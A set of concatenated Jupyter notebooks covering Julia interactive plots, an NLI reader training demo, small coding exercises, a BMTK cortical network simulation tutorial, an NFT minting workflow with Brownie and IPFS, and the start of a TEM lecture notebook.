# # Interactive Plots and Diagrams
using Reactive, Interact
# Interactive plotting can be useful and fun. Here we have a few examples to get you started creating your own interactive plots. We will extensively use the `@manipulate` macro from the [introductory notebook](Introduction.ipynb).
# ## Compose
# [Compose](http://composejl.org) is an excellent tool for creating declarative vector graphics. Here is an example compose diagram you can play around with.
# +
using Colors
using Compose
@manipulate for color=["yellow", "cyan", "tomato"], rotate=0:.05:2π, n=3:20
compose(context(), fill(parse(Colorant, color)),
polygon([((1+sin(θ+rotate))/2, (1+cos(θ+rotate))/2) for θ in 0:2π/n:2π]))
end
# -
# ## Gadfly
using Gadfly
@manipulate for ϕ = 0:π/16:4π, f = [sin, cos], both = false
if both
plot([θ -> sin(θ + ϕ), θ -> cos(θ + ϕ)], 0, 8)
else
plot(θ -> f(θ + ϕ), 0, 8)
end
end
@manipulate for n=1:25, g=[Geom.point, Geom.line]
Gadfly.plot(y=rand(n), x=rand(n), g)
end
# ## PyPlot
using PyPlot
# Since the PyPlot API has functions with side effects, you want to create a figure first and use it in each iteration of `@manipulate` with `withfig`. Notice `f = figure()` and `withfig(f)` in the example below. The rest is straightforward.
f = figure()
x = linspace(0,2π,1000)
@manipulate for α=1:0.1:3, β=1:0.1:3, γ=1:0.1:3, leg="a funny plot"; withfig(f) do
PyPlot.plot(x, cos(α*x + sin(β*x + γ)))
legend([leg])
end
end
# As an added bonus, you can even fire up a Python GUI with `pygui(true)` and be able to use the widgets above to update the plot.
|
doc/notebooks/03-Interactive Diagrams and Plots.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Example Notebook showcasing how we interact with JTReaders
# First change dir to JTR parent
import os
os.chdir('..')
# ### Bookkeeping of all existing readers: `readers.py`
# +
import jack.readers as readers
print("Existing models:\n{}".format(", ".join(readers.readers.keys())))
# -
# ### Load test data
# +
# Loaded some test data to work on
# This loads train, dev, and test data of sizes (2k, 1k, 1k)
import os
from jack.io.load import load_jack
class TestDatasets:
@staticmethod
def generate():
snli_path, snli_data = 'tests/test_data/SNLI/', []
splits = ['train.json', 'dev.json', 'test.json']
for split in splits:
path = os.path.join(snli_path, split)
snli_data.append(load_jack(path))
return snli_data
train_set, dev_set, test_set = TestDatasets.generate()
# -
# ### Create a reader
# +
from jack.core import SharedResources
from jack.util.vocab import Vocab
# Create example reader with a basic config
embedding_dim = 128
hidden_dim = 128
config = {"batch_size": 128, "repr_dim": hidden_dim, "repr_dim_input": embedding_dim, 'dropout' : 0.1}
svac = SharedResources(Vocab(), config)
reader = readers.readers["dam_snli_reader"](svac)
# -
# ### Add hooks
# +
# We create hooks which keep track of the metrics such as the loss
# We also create a classification metric monitoring hook for our model
from jack.util.hooks import LossHook
hooks = [LossHook(reader, iter_interval=10),
readers.eval_hooks['dam_snli_reader'](reader, dev_set, iter_interval=25, batch_size=32)]
# -
# ### Initialise optimiser
# +
# Here we initialise our optimiser
# we choose Adam with standard momentum values and learning rate 0.001
import tensorflow as tf
learning_rate = 0.001
optimizer = tf.train.AdamOptimizer(learning_rate)
# -
# ### Train reader
# Let's train the reader on the CPU for 2 epochs
reader.train(optimizer, train_set, hooks=hooks, max_epochs=2, batch_size=32)
# ### Plotting the results
# This plots the loss
hooks[0].plot()
# This plots the F1 (macro) score and accuracy between 0 and 1
hooks[1].plot(ylim=[0.0, 1.0])
|
notebooks/SNLI.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
#Replace the whole program in hacker rank with the code below
#Or submit this code as a file for testing the program (after converting it into .py extension of course)
x1,v1,x2,v2 = map(int, input().rstrip().split())
def meet_calc(mx, mn, add1, add2):
    # mx, add1: position and jump distance of the kangaroo in front
    # mn, add2: position and jump distance of the kangaroo behind
    while True:
        if add1 < add2:  # the kangaroo behind closes the gap each jump
            if mx == mn:
                return "YES"
            if mx < mn:  # it overtook the leader without landing on it
                return "NO"
        if add1 > add2 or (add1 == add2 and mx > mn):
            return "NO"  # the gap never closes
        mx += add1
        mn += add2
def kangaroo(x1,v1,x2,v2):
if(x1>x2):
return meet_calc(x1,x2,v1,v2)
elif(x2>x1):
return meet_calc(x2,x1,v2,v1)
elif (x1==x2):
return "YES"
print(kangaroo(x1,v1,x2,v2))
# -
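# The loop above simulates the kangaroos jump by jump. As a sketch of a constant-time alternative (not part of the original submission): the kangaroos meet exactly when the head start is a non-negative whole multiple of the speed difference.

```python
def kangaroo_closed_form(x1, v1, x2, v2):
    # Equal speeds: they meet only if they start at the same position.
    if v1 == v2:
        return "YES" if x1 == x2 else "NO"
    # They share a spot after jump k if x1 + k*v1 == x2 + k*v2 for an integer k >= 0.
    k, remainder = divmod(x2 - x1, v1 - v2)
    return "YES" if remainder == 0 and k >= 0 else "NO"

print(kangaroo_closed_form(0, 3, 4, 2))  # YES
print(kangaroo_closed_form(0, 2, 5, 3))  # NO
```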
|
Kangaroo.ipynb
|
# +
"""
Rainbows & Wobniars
"""
# Write a function called "wobniar", which should contain the local variable "rainbow" below. The function should collect every other color of the rainbow starting at index 0 and add each one to a new list. When you add each color, it should be spelled backwards. For example, the word 'sing' would be added to the new list as 'gnis'. Return and print the list.
def wobniar():
    rainbow = ['red', 'orange', 'yellow', 'green', 'blue', 'indigo', 'violet']
    backwards = []
    for color in rainbow[::2]:  # every other color, starting at index 0
        backwards.append(color[::-1])  # spelled backwards
    return backwards
a = wobniar()
print(a) # ['der', 'wolley', 'eulb', 'teloiv']
|
pset_functions/data_manipulation/solutions/nb/p4.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Tutorial 4: Multi-population recurrent network (with BioNet)
#
# Here we will create a heterogeneous yet relatively small network consisting of hundreds of cells recurrently connected. All cells will belong to one of four "cell-types". Two of these cell types will be biophysically detailed cells, i.e. containing a full morphology and somatic and dendritic channels and receptors. The other two will be point-neuron models, which lack a full morphology or channels but still act to provide inhibitory and excitatory dynamics.
#
# As input to drive the simulation, we will also create an external network of "virtual cells" that synapse directly onto our internal cells and provide spike-train stimuli.
#
# **Note** - scripts and files for running this tutorial can be found in the directory [sources/chapter04/](https://github.com/AllenInstitute/bmtk/tree/develop/docs/tutorial/sources/chapter04)
#
# requirements:
# * bmtk
# * NEURON 7.4+
# ## 1. Building the network
#
# #### cells
#
# This network will loosely resemble the mouse V1 cortical column. Along the center of the column will be a population of 100 biophysically detailed neurons: 80 excitatory Scnn1a cells and 20 inhibitory PV cells.
# +
import numpy as np
from bmtk.builder.networks import NetworkBuilder
from bmtk.builder.auxi.node_params import positions_columinar, xiter_random
net = NetworkBuilder("V1")
net.add_nodes(
N=80, pop_name='Scnn1a',
positions=positions_columinar(N=80, center=[0, 50.0, 0], max_radius=30.0, height=100.0),
rotation_angle_yaxis=xiter_random(N=80, min_x=0.0, max_x=2*np.pi),
rotation_angle_zaxis=xiter_random(N=80, min_x=0.0, max_x=2*np.pi),
tuning_angle=np.linspace(start=0.0, stop=360.0, num=80, endpoint=False),
location='VisL4',
ei='e',
model_type='biophysical',
model_template='ctdb:Biophys1.hoc',
model_processing='aibs_perisomatic',
dynamics_params='472363762_fit.json',
morphology='Scnn1a_473845048_m.swc'
)
net.add_nodes(
N=20, pop_name='PV',
positions=positions_columinar(N=20, center=[0, 50.0, 0], max_radius=30.0, height=100.0),
rotation_angle_yaxis=xiter_random(N=20, min_x=0.0, max_x=2*np.pi),
rotation_angle_zaxis=xiter_random(N=20, min_x=0.0, max_x=2*np.pi),
location='VisL4',
ei='i',
model_type='biophysical',
model_template='ctdb:Biophys1.hoc',
model_processing='aibs_perisomatic',
dynamics_params='472912177_fit.json',
morphology='Pvalb_470522102_m.swc'
)
# -
# To set the position and rotation of each cell, we use the built-in functions positions_columinar and xiter_random, which return a list of values given the parameters. A user could set the values themselves using a list (or a function that returns a list) of size N. Parameters like location, ei (potential), params_file, etc. are cell-type parameters and will be used for all N cells of that type.
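# For illustration, a hypothetical sketch (not from the tutorial) of building such a list yourself: any length-N array of (x, y, z) coordinates could be passed to add_nodes(positions=...) in place of the helper.

```python
import numpy as np

# Draw N positions uniformly inside a box around the column center;
# the variable names here are made up for the example.
N = 80
rng = np.random.default_rng(seed=0)
custom_positions = rng.uniform(low=[-30.0, 0.0, -30.0],
                               high=[30.0, 100.0, 30.0],
                               size=(N, 3))
print(custom_positions.shape)  # (80, 3)
```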
#
# The excitatory cells are also given a tuning_angle parameter. An intrinsic "tuning angle" is a property found in some cells in the visual cortex. In this model, we will use this property to determine the number and strength of connections between subsets of cells via custom functions. In general, most models will not have or use a tuning angle, but they may require some other parameter; users can assign whatever custom parameters they want to cells and cell-types and use them as properties for creating connections and running simulations.
#
# Next we continue to create our point (integrate-and-fire) neurons. Notice they don't have properties like y/z rotation or morphology, as those wouldn't apply to point neurons.
# +
net.add_nodes(
N=200, pop_name='LIF_exc',
positions=positions_columinar(N=200, center=[0, 50.0, 0], min_radius=30.0, max_radius=60.0, height=100.0),
tuning_angle=np.linspace(start=0.0, stop=360.0, num=200, endpoint=False),
location='VisL4',
ei='e',
model_type='point_process',
model_template='nrn:IntFire1',
dynamics_params='IntFire1_exc_1.json'
)
net.add_nodes(
N=100, pop_name='LIF_inh',
positions=positions_columinar(N=100, center=[0, 50.0, 0], min_radius=30.0, max_radius=60.0, height=100.0),
location='VisL4',
ei='i',
model_type='point_process',
model_template='nrn:IntFire1',
dynamics_params='IntFire1_inh_1.json'
)
# -
# #### connections
#
# Now we want to create connections between the cells. Depending on the model type, and on whether the presynaptic "source" cell is excitatory or inhibitory, we will use different synaptic models and parameters. Using the source and target filter parameters, we can create different connection types.
#
# To determine the excitatory-to-excitatory connection matrix we want to use the distance and tuning_angle properties. To do this we create a customized function "dist_tuning_connector"
# +
import random
import math
def dist_tuning_connector(source, target, d_weight_min, d_weight_max, d_max, t_weight_min, t_weight_max, nsyn_min,
nsyn_max):
if source['node_id'] == target['node_id']:
# Avoid self-connections
return None
r = np.linalg.norm(np.array(source['positions']) - np.array(target['positions']))
if r > d_max:
dw = 0.0
else:
t = r / d_max
dw = d_weight_max * (1.0 - t) + d_weight_min * t
if dw <= 0:
# drop the connection if the weight is too low
return None
# next create weights by orientation tuning [ aligned, misaligned ] --> [ 1, 0 ], Check that the orientation
# tuning property exists for both cells; otherwise, ignore the orientation tuning.
if 'tuning_angle' in source and 'tuning_angle' in target:
# 0-180 is the same as 180-360, so just modulo by 180
delta_tuning = math.fmod(abs(source['tuning_angle'] - target['tuning_angle']), 180.0)
# 90-180 needs to be flipped, then normalize to 0-1
delta_tuning = delta_tuning if delta_tuning < 90.0 else 180.0 - delta_tuning
t = delta_tuning / 90.0
tw = t_weight_max * (1.0 - t) + t_weight_min * t
else:
tw = dw
# drop the connection if the weight is too low
if tw <= 0:
return None
# filter out nodes by treating the weight as a probability of connection
if random.random() > tw:
return None
# Add the number of synapses for every connection.
# It is probably very useful to take this out into a separate function.
return random.randint(nsyn_min, nsyn_max)
# -
# The first two parameters of this function are "source" and "target", and they are required for all custom connector functions. These are node objects which give a representation of a single source and target cell, with properties that can be accessed like a Python dictionary. When the Network Builder is creating the connection matrix, it calls this function for all possible source-target pairs; the user doesn't call this function directly.
#
# The remaining parameters are optional. Using these parameters, plus the distance and angles between source and target cells, this function determines the number of connections between each given source and target cell. If there are none you can return either None or 0.
#
# To create these connections we call the add_edges method of the builder. We use the source and target parameters to filter out only excitatory-to-excitatory connections. We must also take into consideration the model type (biophysical or integrate-and-fire) of the target when setting parameters. We pass in the function through the connection_rule parameter, and the function parameters (except source and target) through connection_params. (If our dist_tuning_connector function had no parameters other than source and target, we could simply omit connection_params.)
# +
net.add_edges(
source={'ei': 'e'}, target={'pop_name': 'Scnn1a'},
connection_rule=dist_tuning_connector,
connection_params={'d_weight_min': 0.0, 'd_weight_max': 0.34, 'd_max': 300.0, 't_weight_min': 0.5,
't_weight_max': 1.0, 'nsyn_min': 3, 'nsyn_max': 7},
syn_weight=6.4e-05,
weight_function='gaussianLL',
weight_sigma=50.0,
distance_range=[30.0, 150.0],
target_sections=['basal', 'apical'],
delay=2.0,
dynamics_params='AMPA_ExcToExc.json',
model_template='exp2syn'
)
net.add_edges(
source={'ei': 'e'}, target={'pop_name': 'LIF_exc'},
connection_rule=dist_tuning_connector,
connection_params={'d_weight_min': 0.0, 'd_weight_max': 0.34, 'd_max': 300.0, 't_weight_min': 0.5,
't_weight_max': 1.0, 'nsyn_min': 3, 'nsyn_max': 7},
syn_weight=0.0019,
weight_function='gaussianLL',
weight_sigma=50.0,
delay=2.0,
dynamics_params='instanteneousExc.json',
model_template='exp2syn'
)
# -
# Similarly we create the other types of connections. But since either the source, the target, or both cells will not have the tuning_angle parameter, we don't want to use dist_tuning_connector. Instead we can use the built-in distance_connector function, which creates connections determined by distance alone.
# +
from bmtk.builder.auxi.edge_connectors import distance_connector
### Generating I-to-I connections
net.add_edges(
source={'ei': 'i'}, target={'ei': 'i', 'model_type': 'biophysical'},
connection_rule=distance_connector,
connection_params={'d_weight_min': 0.0, 'd_weight_max': 1.0, 'd_max': 160.0, 'nsyn_min': 3, 'nsyn_max': 7},
syn_weight=0.0002,
weight_function='wmax',
distance_range=[0.0, 1e+20],
target_sections=['somatic', 'basal'],
delay=2.0,
dynamics_params='GABA_InhToInh.json',
model_template='exp2syn'
)
net.add_edges(
source={'ei': 'i'}, target={'ei': 'i', 'model_type': 'point_process'},
connection_rule=distance_connector,
connection_params={'d_weight_min': 0.0, 'd_weight_max': 1.0, 'd_max': 160.0, 'nsyn_min': 3, 'nsyn_max': 7},
syn_weight=0.00225,
weight_function='wmax',
delay=2.0,
dynamics_params='instanteneousInh.json',
model_template='exp2syn'
)
### Generating I-to-E connections
net.add_edges(
source={'ei': 'i'}, target={'ei': 'e', 'model_type': 'biophysical'},
connection_rule=distance_connector,
connection_params={'d_weight_min': 0.0, 'd_weight_max': 1.0, 'd_max': 160.0, 'nsyn_min': 3, 'nsyn_max': 7},
syn_weight=0.00018,
weight_function='wmax',
distance_range=[0.0, 50.0],
target_sections=['somatic', 'basal', 'apical'],
delay=2.0,
dynamics_params='GABA_InhToExc.json',
model_template='exp2syn'
)
net.add_edges(
source={'ei': 'i'}, target={'ei': 'e', 'model_type': 'point_process'},
connection_rule=distance_connector,
connection_params={'d_weight_min': 0.0, 'd_weight_max': 1.0, 'd_max': 160.0, 'nsyn_min': 3, 'nsyn_max': 7},
syn_weight=0.009,
weight_function='wmax',
delay=2.0,
dynamics_params='instanteneousInh.json',
model_template='exp2syn'
)
### Generating E-to-I connections
net.add_edges(
source={'ei': 'e'}, target={'pop_name': 'PV'},
connection_rule=distance_connector,
connection_params={'d_weight_min': 0.0, 'd_weight_max': 0.26, 'd_max': 300.0, 'nsyn_min': 3, 'nsyn_max': 7},
syn_weight=0.00035,
weight_function='wmax',
distance_range=[0.0, 1e+20],
target_sections=['somatic', 'basal'],
delay=2.0,
dynamics_params='AMPA_ExcToInh.json',
model_template='exp2syn'
)
net.add_edges(
source={'ei': 'e'}, target={'pop_name': 'LIF_inh'},
connection_rule=distance_connector,
connection_params={'d_weight_min': 0.0, 'd_weight_max': 0.26, 'd_max': 300.0, 'nsyn_min': 3, 'nsyn_max': 7},
syn_weight=0.0043,
weight_function='wmax',
delay=2.0,
dynamics_params='instanteneousExc.json',
model_template='exp2syn'
)
# -
# Finally we build the network (this may take a bit of time since it's essentially iterating over all 400x400 possible connection combinations), and save the nodes and edges.
net.build()
net.save_nodes(output_dir='sim_ch04/network')
net.save_edges(output_dir='sim_ch04/network')
# ### Building external network
#
# Next we want to create an external network consisting of virtual cells that form a feedforward network onto our V1, which will provide input during the simulation. We will call this LGN, since the LGN is the primary input to the layer 4 cells of V1 (if we wanted to, we could also create multiple external networks and run simulations on any number of them).
#
# First we build our LGN nodes. Then we must import the V1 network nodes, and create connections between LGN --> V1.
# +
from bmtk.builder.networks import NetworkBuilder
lgn = NetworkBuilder('LGN')
lgn.add_nodes(
N=500,
pop_name='tON',
potential='exc',
model_type='virtual'
)
# -
# As before, we will use a customized function to determine the number of connections between each source and target pair; however, this time our connection_rule is a bit different.
#
# In the previous example, our connection_rule function's first two arguments were the presynaptic and postsynaptic cells, which allowed us to choose how many synaptic connections between the pairs existed based on individual properties:
# ```python
# def connection_fnc(source, target, ...):
# source['param'] # presynaptic cell params
# target['param'] # postsynaptic cell params
# ...
# return nsyns # number of connections between pair
# ```
#
# But for our LGN --> V1 connections, we do things a bit differently. We want to make sure that every target cell is connected to only a limited number of presynaptic source cells. That is not really possible with a function that iterates on a one-to-one basis, so instead we use a connector function whose first parameter is the list of all N source cells and whose second parameter is a single target cell. It returns an array of N integers, with each index giving the number of synapses between the corresponding source and the target.
#
# To tell the builder to use this schema, we must set iterator='all_to_one' in the add_edges method. (By default this is set to 'one_to_one'. You can also use 'one_to_all' iterator which will pass in a single source and all possible targets).
# +
def select_source_cells(sources, target, nsources_min=10, nsources_max=30, nsyns_min=3, nsyns_max=12):
total_sources = len(sources)
nsources = np.random.randint(nsources_min, nsources_max)
selected_sources = np.random.choice(total_sources, nsources, replace=False)
syns = np.zeros(total_sources)
syns[selected_sources] = np.random.randint(nsyns_min, nsyns_max, size=nsources)
return syns
lgn.add_edges(
source=lgn.nodes(), target=net.nodes(pop_name='Scnn1a'),
iterator='all_to_one',
connection_rule=select_source_cells,
connection_params={'nsources_min': 10, 'nsources_max': 25},
syn_weight=4e-03,
weight_function='wmax',
distance_range=[0.0, 150.0],
target_sections=['basal', 'apical'],
delay=2.0,
dynamics_params='AMPA_ExcToExc.json',
model_template='exp2syn'
)
lgn.add_edges(
source=lgn.nodes(), target=net.nodes(pop_name='PV'),
connection_rule=select_source_cells,
connection_params={'nsources_min': 15, 'nsources_max': 30},
iterator='all_to_one',
syn_weight=0.001,
weight_function='wmax',
distance_range=[0.0, 1.0e+20],
target_sections=['somatic', 'basal'],
delay=2.0,
dynamics_params='AMPA_ExcToInh.json',
model_template='exp2syn'
)
lgn.add_edges(
source=lgn.nodes(), target=net.nodes(pop_name='LIF_exc'),
connection_rule=select_source_cells,
connection_params={'nsources_min': 10, 'nsources_max': 25},
iterator='all_to_one',
syn_weight= 0.045,
weight_function='wmax',
delay=2.0,
dynamics_params='instanteneousExc.json',
model_template='exp2syn'
)
lgn.add_edges(
source=lgn.nodes(), target=net.nodes(pop_name='LIF_inh'),
connection_rule=select_source_cells,
connection_params={'nsources_min': 15, 'nsources_max': 30},
iterator='all_to_one',
syn_weight=0.02,
weight_function='wmax',
delay=2.0,
dynamics_params='instanteneousExc.json',
model_template='exp2syn'
)
lgn.build()
lgn.save_nodes(output_dir='sim_ch04/network')
lgn.save_edges(output_dir='sim_ch04/network')
# -
# ## 2. Setting up BioNet
#
# #### file structure.
#
# Before running a simulation, we will need to create the runtime environment, including parameter files, run scripts and configuration files. You can copy the files from an existing simulation, or execute the following command:
#
# ```bash
# $ python -m bmtk.utils.sim_setup \
# --report-vars v \
# --report-nodes 10,80 \
# --network sim_ch04/network \
# --dt 0.1 \
# --tstop 3000.0 \
# --include-examples \
# --compile-mechanisms \
# bionet sim_ch04
# ```
#
# or run it directly in python
# +
from bmtk.utils.sim_setup import build_env_bionet
build_env_bionet(
base_dir='sim_ch04',
config_file='config.json',
network_dir='sim_ch04/network',
tstop=3000.0, dt=0.1,
report_vars=['v'], # Record membrane potential (default soma)
include_examples=True, # Copies components files
compile_mechanisms=True # Will try to compile NEURON mechanisms
)
# -
# This will fill out **sim_ch04** with all the files we need to run the simulation. Files of interest include:
#
# * **circuit_config.json** - A configuration file that contains the location of the network files we created above, plus the location of neuron and synaptic models, templates, morphologies and mechanisms required to instantiate individual cell models.
#
#
# * **simulation_config.json** - contains information about the simulation, including initial conditions and run-time configuration (_run_ and _conditions_). In the _inputs_ section we define the external sources used to drive the network (in this case a current clamp), and in the _reports_ section we define the variables (soma membrane potential and calcium) that will be recorded during the simulation.
#
#
# * **run_bionet.py** - A script for running our simulation. Usually this file doesn't need to be modified.
#
#
# * **components/biophysical_neuron_models/** - The parameter files for the cells we're modeling. Originally [downloaded from the Allen Cell Types Database](http://celltypes.brain-map.org/neuronal_model/download/482934212). These files were automatically copied over when we used the _include-examples_ directive. If using a different or extended set of cell models, place them here.
#
#
# * **components/morphologies/** - The morphology files for our cells. Originally [downloaded from the Allen Cell Types Database](http://celltypes.brain-map.org/neuronal_model/download/482934212) and copied over by the _include-examples_ directive.
#
#
# * **components/point_neuron_models/** - The parameter file for our LIF_exc and LIF_inh cells.
#
#
# * **components/synaptic_models/** - Parameter files used to create different types of synapses.
#
# #### lgn input
#
# We need to provide our LGN external network cells with spike-trains so they can activate our recurrent network. Previously we showed how to do this by generating csv files. We can also use NWB files, which are a common format for saving electrophysiological data in neuroscience.
#
# We can use any NWB file generated experimentally or computationally, but for this example we will use a preexisting one. First download the file:
# ```bash
# $ wget https://github.com/AllenInstitute/bmtk/blob/develop/docs/examples/spikes_inputs/lgn_spikes.h5?raw=true -O lgn_spikes.h5
# ```
# or copy from [here](https://github.com/AllenInstitute/bmtk/tree/develop/docs/examples/spikes_inputs/lgn_spikes.nwb).
#
#
# Then we must edit the **simulation_config.json** file to tell the simulator to find the nwb file and which network to associate it with.
#
# ```json
# {
# "inputs": {
# "LGN_spikes": {
# "input_type": "spikes",
# "module": "sonata",
# "input_file": "$BASE_DIR/lgn_spikes.h5",
# "node_set": "LGN"
# }
# }
# }
# ```
#
# ## 3. Running the simulation
#
#
# We are close to running our simulation, however unlike in previous chapters we need a little more programming before we can begin.
#
# For most of the connections we added the parameter weight_function='wmax'. This is a built-in function that tells the simulator, when creating a connection between two cells, to simply use the syn_weight value assigned to the given edge-type.
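# As a sketch of that assumed behavior (not the simulator's actual source), such a weight function simply passes the edge-type weight through unchanged:

```python
def wmax_sketch(edge_props, source, target):
    # Ignore the individual source/target cells and return the
    # weight stored on the edge-type.
    return edge_props["syn_weight"]

print(wmax_sketch({"syn_weight": 6.4e-05}, None, None))  # 6.4e-05
```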
#
# However, when creating excitatory-to-excitatory connections we used weight_function='gaussianLL'. This is because we want to use the tuning_angle parameter, when available, to determine the synaptic strength between two cells. First we create the function, which takes in the target, source and connection properties (the edge-type properties set in the add_edges method). Then we must register the function with the BioNet simulator:
# +
import math
from bmtk.simulator.bionet.pyfunction_cache import add_weight_function
def gaussianLL(edge_props, source, target):
src_tuning = source['tuning_angle']
tar_tuning = target['tuning_angle']
w0 = edge_props["syn_weight"]
sigma = edge_props["weight_sigma"]
delta_tuning = abs(abs(abs(180.0 - abs(float(tar_tuning) - float(src_tuning)) % 360.0) - 90.0) - 90.0)
return w0 * math.exp(-(delta_tuning / sigma) ** 2)
add_weight_function(gaussianLL)
# -
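# The nested abs expression folds any angle difference into the 0 to 90 degree range, matching the modulo-and-flip logic used earlier in dist_tuning_connector. A quick sanity check of that equivalence (a standalone snippet, not part of the tutorial):

```python
import math

def folded(a, b):
    # the expression used inside gaussianLL
    return abs(abs(abs(180.0 - abs(float(a) - float(b)) % 360.0) - 90.0) - 90.0)

def folded_ref(a, b):
    # the modulo-180-then-flip version from dist_tuning_connector
    d = math.fmod(abs(a - b), 180.0)
    return d if d < 90.0 else 180.0 - d

for a, b in [(10.0, 200.0), (0.0, 90.0), (5.0, 355.0), (0.0, 170.0)]:
    assert abs(folded(a, b) - folded_ref(a, b)) < 1e-9
```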
# The weights will be adjusted before each simulation, and the function can be changed between different runs. Simply opening the edge_types.csv file with a text editor and altering the weight_function column allows users to take an existing network and readjust weights on the fly.
#
# Finally we are ready to run the simulation. Note that because this is a 400-cell simulation, it may be computationally intensive for some older computers and may take anywhere from a few minutes to half an hour to complete.
# +
from bmtk.simulator import bionet
conf = bionet.Config.from_json('sim_ch04/config.json')
conf.build_env()
net = bionet.BioNetwork.from_config(conf)
sim = bionet.BioSimulator.from_config(conf, network=net)
sim.run()
# -
# ## 4. Analyzing results
#
# Results of the simulation, as specified in the config, are saved into the output directory. Using the analyzer functions, we can do things like plot the raster plot
# +
from bmtk.analyzer.spike_trains import plot_raster, plot_rates_boxplot
plot_raster(config_file='sim_ch04/config.json', group_by='pop_name')
# -
# and the rates of each node
plot_rates_boxplot(config_file='sim_ch04/config.json', group_by='pop_name')
# In our config file we used the cell_vars and node_id_selections parameters to save the calcium influx and membrane potential of selected cells. We can also use the analyzer to display these traces:
# +
from bmtk.analyzer.compartment import plot_traces
_ = plot_traces(config_file='sim_ch04/config.json', group_by='pop_name', report_name='v_report')
# -
|
docs/tutorial/04_multi_pop.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# # Requirements
#
# ## Python
# +
import sys
python_version = (
f"{sys.version_info.major}."
f"{sys.version_info.minor}."
f"{sys.version_info.micro}"
)
print(f"Python version {python_version}")
# -
# Choose any of the following methods to install dependencies
# * poetry (recommended) <br/><br/>
# `poetry install` <br/><br/>
# * pip <br/><br/>
# `pip install -r requirements.txt`
#
# ## IPFS CLI
#
# Follow this URL https://docs.ipfs.io/install/command-line/#official-distributions
# # Import modules
# +
import brownie
from brownie import accounts, project, config, network
# Compile smart contracts
p = project.load('.', name="pynft")
p.load_config()
# -
# # Connect to chain
# +
import os
print("Available networks")
print(os.popen("brownie networks list").read())
# -
# ## Connect
NETWORK = "rinkeby"
# network.connect(NETWORK) # Main net fork
# network.connect(NETWORK) # Main net
network.connect(NETWORK) # Test net rinkeby
# # Account
# !brownie accounts list
# +
if NETWORK == "mainnet" and False:
from scripts.helpful_script import get_account
account = get_account()
else:
from brownie import accounts
accounts.load("eth-main") # Main net
account = accounts[0]
# -
print(account)
# # Dump variables
for key, value in p.__dict__.items():
print(key)
brownie.__dict__[key] = p.__dict__[key]
# # Deploy contracts
# +
from brownie import PYNFT
pynft = PYNFT.deploy({"from": account})
# -
# # Upload file to IPFS
# ## Assets
# +
prefix = "assets/"
def upload_to_ipfs(filepath: str) -> str:
return os.popen(f"ipfs add -q {filepath}").read().strip()
def is_an_image(filename: str) -> bool:
    """
    Description:
        Check if a file is an image
    params:
        filename:
            (str) filename, including its extension
    returns:
        (bool) True if the filename ends with an image extension
    """
    for extension in [".png", ".jpg"]:
        if filename.endswith(extension):
            return True
    return False
def set_ipfs_share_link(prefix: str, asset: str) -> str:
"""
description:
Run IPFS upload process and return share link URL
params:
prefix:
(str) Local prefix file
asset:
(str) Filename
returns:
(str) share link url
"""
IPFS_PREFIX = "https://ipfs.io/ipfs"
qid = upload_to_ipfs(f"{prefix}{asset}".replace(" ", "\ "))
asset = asset.replace(" ", "-")
return f"{IPFS_PREFIX}/{qid}?filename={asset}"
class Attribute:
pass
attribute = Attribute()
for asset in os.listdir(prefix):
if asset.startswith(".") or asset == "metadata.json":
# Skip
continue
ipfs_share_link = set_ipfs_share_link(prefix, asset)
if is_an_image(asset):
setattr(attribute, "image_url", ipfs_share_link)
else:
setattr(attribute, "external_url", ipfs_share_link)
print(ipfs_share_link)
# -
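# A hypothetical variant of the upload helper using subprocess instead of os.popen (it assumes the same `ipfs` CLI is on the PATH): passing the path as a list element avoids the manual escaping of spaces, and check=True surfaces CLI failures as exceptions.

```python
import subprocess

def upload_to_ipfs_subprocess(filepath: str) -> str:
    # Returns the CID printed by `ipfs add -q`; raises CalledProcessError
    # if the CLI is missing or the add fails.
    result = subprocess.run(
        ["ipfs", "add", "-q", filepath],
        capture_output=True, text=True, check=True,
    )
    return result.stdout.strip()
```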
# # Set up metadata
# ## Render metadata from template
metadata = {
"description": """It was in 2015, I was an engineer intern.
I was assigned to code in Python for satellite signal processing.
At that time, I had no experience with it, but I had completed C#, C and Matlab courses.
It inspired me to transfer from electrical to software engineer career path.
Now, I partially succeed in software engineering, machine learning and A.I implementation.
This NFT determines where I started.
Moreover, I minting this NFT with my Solidity code I created by myself.
No, it's not my first Solidity project :D
But it's my first Solidity project deployed in `production`.
Which means this is the starting point for my smart contract development.
Smart contract repository is located in https://github.com/batprem/pynft
""",
"external_url": attribute.external_url,
"image": attribute.image_url,
"name": "My first Python code",
"attributes": [],
}
# ## Save metadata into JSON
# +
import json
metadata_filename = "metadata.json"
with open(f"assets/{metadata_filename}", "w") as json_file:
json.dump(metadata, json_file)
metadata_share_link = set_ipfs_share_link(prefix, metadata_filename)
# -
# # Assign to smart contract
# ## Mint
PYNFT[-1].createCollectable({"from": account}).wait(1)
# ## Set URI
PYNFT[-1].setBaseURI(metadata_share_link, {"from": account}).wait(1)
PYNFT[-1].tokenURI(0)
PYNFT[-1].tokenCounter()
# ## Reference
#
# * https://www.youtube.com/watch?v=M576WGiDBdQ&t=8373s
|
MintNFT.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <font size = "5"> **Chapter 1: [Introduction](CH1_00-Introduction.ipynb)** </font>
#
#
# <hr style="height:1px;border-top:4px solid #FF8200" />
#
# # Introduction to this Jupyter Lecture Notebook-Book
#
#
# [Download](https://raw.githubusercontent.com/gduscher/MSE672-Introduction-to-TEM//main/Introduction/CH1_00-Introduction.ipynb)
#
# [](
# https://colab.research.google.com/github/gduscher/MSE672-Introduction-to-TEM/blob/main/Introduction/CH1_00-Introduction.ipynb)
#
#
# part of
#
